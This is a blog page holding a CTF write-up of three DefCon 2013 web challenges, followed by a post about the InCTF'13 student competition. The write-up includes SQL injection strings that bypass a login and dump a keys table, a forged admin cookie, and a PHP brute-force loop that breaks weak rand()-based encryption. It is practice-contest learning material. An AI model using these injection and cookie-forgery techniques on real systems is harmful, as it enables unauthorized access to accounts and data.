Monday, 17 June 2013

Defcon 2013 3dub - 1, 2 and 4. Web WriteUp

DefCon 2013 3dub - Web based challenges.

This is the first time 'm writing Wiriteup for any ctf [practice].  So please bare with it :D

3dub - 1

What ever name to enter in the username field will be accepted and you be logged in with that name.
After logging in you will get a message that LOGIN as admin.

but if give "admin" in the username field , You will get a message saying admin login disabled.

But for every login with different usernames the cookies where changing.

Observation -->
username  cookie 

a - 09
b - 0a
ab - 09ce
ba - 0acd
abc - 09cd29
aaaaaa - 09cd2994af
its just a hex based addition with the base "aaaaa". But no need to do the hex addition also.
get cookie for 
admi - 09c8259c
aaaan- 09cd2994a0

=> admin - 09c8259ca0

save cookie and refresh, you get the key.
the key is The key is: who wants oatmeal raisin anyways twumpAdby

Easiest challenge in DefCon 2013.

3dub - 2

Login page.

Obviously tried SQL injection first. WORKED!
but i could login as root but no use because no key.

Tried analysis the GET and POST requests in ZAP.
X-SQL : SELECT name FROM users WHERE name ='   ' and pasword='   ' limit 1;

waste time crafting requests wrt to MySQL.
I could login as root and anynumber from 0 yo +Inf :D

Afterwards i found it was SQLite. The done -

  • asd'OR'1'='1' UNION SELECT name FROM sqlite_master WHERE type = "table"--I logged in as keys.
  • asd'OR'1'='1' UNION SELECT name FROM keys --
got the key-
logged in as The key is: literally online lolling on line WucGesJi

3dub - 4

Was a easy one but wasted more than 6 hours in this still managed NOT to get the key. Like a BOSS XD

File name and the access code..
it opened for usernmaes.txt with accesscode - 60635c6862d44e8ac17dc5e144c66539.
But no access fro passwords.txt with the same accesscode.

Found that accesscode=md5(filename)

Opened the passwords.txt i was shocked to see everything was SHA-512/SALT hashing.
Thought i would move on to next one than decrypting these passwords.
But that would be lame to hash to that extent. That was a distraction. :p

Time to brute force the filename. Found
key.txt with accesscode - 65c2a527098e1f7747eec58e1925b453

Content of key.txt-
By looking at the content of key.txt it was base64. Decoded with online base64 deocder. Got invalid ascii code not the key!

content of key.txt was changing with time. Suspected functions - time() and rand().
Major time waste here.

Afterwards i gave the getfile.php which was helping us to opne the file.
getfile.php with accesscode- 0701593e23e676eaba834916a6ac7272.

Contents of getfile.php-

Acces granted to getfile.php!

$value = time();
$filename = $_GET["filename"];
$accesscode = $_GET["accesscode"];
if (md5($filename) == $accesscode){
echo "Acces granted to $filename!

if (in_array($filename, array('getfile.php', 'index.html', 'key.txt', 'login.php', 'passwords.txt', 'usernames.txt'))==TRUE){
$data = file_get_contents($filename);
if ($data !== FALSE) {
if ($filename == "key.txt") {
$key = rand();
$cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
echo base64_encode($cyphertext);
echo nl2br($data);

echo "File does not exist";
echo "File does not exist";

echo "Invalid access code";

***k it! 'm going to sleep. But i dint. Because I have wasted a lot of time on this..
This needed a Brute force. No way for manually doing that.

Brute force script in PHP -
for ($key = 0; $key <= getrandmax(); $key++) 

$text="5HHOwWMXYH5UxvzIzxqMY3vuwyCJ5BVdzwm5puqduZrsPTxfsFNKXXMlwhZj5W/1o  Sv3ENrCpbIMF9cJQ5Gndg==";

$data=mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($text),           MCRYPT_MODE_CBC);

echo $data;
echo "<br>";

Dump of brute force.

Search for the string with starting "the key is".
No match found. No idea WHY?

Waiting for other Writeups from pros to find my mistake.

Any suggestions, please comment.

Update on 18-06-2013-->

With the help of the comment by CĂ©lestin Perdu got to know where i had missed the point.

You can use ZAP or Burp Suite anything. Get the date and time of the response, convert it to linux timestamp.

$ date -d "which you got from the tool" +% s

Use this value as key. And you should get the flag.

Thanks for reading. Suggestion and comments welcomed!

Wednesday, 12 June 2013

InCTF'13 [Amrita Cyber Security]

National level Capture the flag contest targeting only for Undergraduate, graduate and post-graduate level students.

This CTF is meant just for learning and getting more good teams from India into world finals in CTF contest.
FYI: CTF means capture the flag.

I would recommend any one interested in computer's to give this CTF a try. They teach you through the process. But yeah! HARD WORK is expected from you. And you should have some programming knowledge. Doesn't matter from which branch/stream of specialisation you are doing. Don't think its meant only for geeks from computer science branch. I'm from Electronics and Communication background still took a respectable position in InCTF'13 --> second position. Even if you are from mechanical background still fascinated about these computer stuff. Then go ahead start off with InCTF.

As i have said earlier InCTF aims more on learning.
This is how InCTF works->

1st round -

  • Purely meant for learning.
  • Designed smartly by the admins/organisers of InCTF, to divide the work between the team members. Everyone can't be good in everything so you got to stick the topics which you choose to take in this round. And become good at it.
  • Topics- Basics of Linux, SQL [ Web Based ], secure programming, Reverse Engineering, Cryptography.
This round is not mandatory but I STRONGLY RECOMMEND to take this round seriously and use it to learn. Because the organisers are ready to help to any time during 1st round.

The tool needed to finish this round successfully is GOOGLE.

2nd round - Jeopardy type.

Qualification round for National level finals i.e main CTF game.

This time they gave us 1 week time duration UNLIKE other CTF's which has 1-2days.
This round is damn interesting because for noobs like US, we need to learn and then use that knowledge to complete the tasks. So utilized this round also for learning.

I saw that many teams where giving up because they had NO CLUE about how to even look at the tasks. Even when we opened the task, we were BLANK. But according to me what you need is just PATIENCE and DETERMINATION. That's all, you can solve 80% of tasks in all categories. What you need is just patience and determination. Any time you can walk into their IRC and query them if you are on your right path for solving a particular task or not.

3rd round - Capture the flag

Time to implement! Time to test what you have learnt!

1st day you will have a mock round, which gives an idea about what to do the next day. Basically aimed at not wasting the time on the contest day. Every minute matters in the finals.

Basically you will have to exploit the different types of services to get the flag.

Your team will be scored/valued on your

  1. Defence - your patching work.
  2. Offence - exploiting other team services and submitting their precious flags :p
  3. Ethical - reporting advisories.
That's all about InCTF.

We participated with the team name r00t. 
Team members-
  • y0g1337h - Yogeesh Seralthan,
  • vn4v1n - Movnavinothan V &
  • x7r0n - Adithya Naresh.
1st round we divided the work and learnt.
2nd round. LANing up is very important. We LANed up in our college hostel [ Amrita School of Engineering ] :p
3rd round. We had awesome fun exploiting services, patching them, and reporting the vulnerabilities.

Thanks for organising such a awesome event -
Arvind S Raj, Seshagiri Prabhu, Bithin Alangot.
They represent the team bi0s. One of the 1337 team in INDIA.

Pic of the trophy we earned in InCTF'13

So what are you waiting for. Form a team and start working. earn the trophy + good cash prize + respect + knowledge + recognition.

Useful link-

Google groups

Feel free to comment.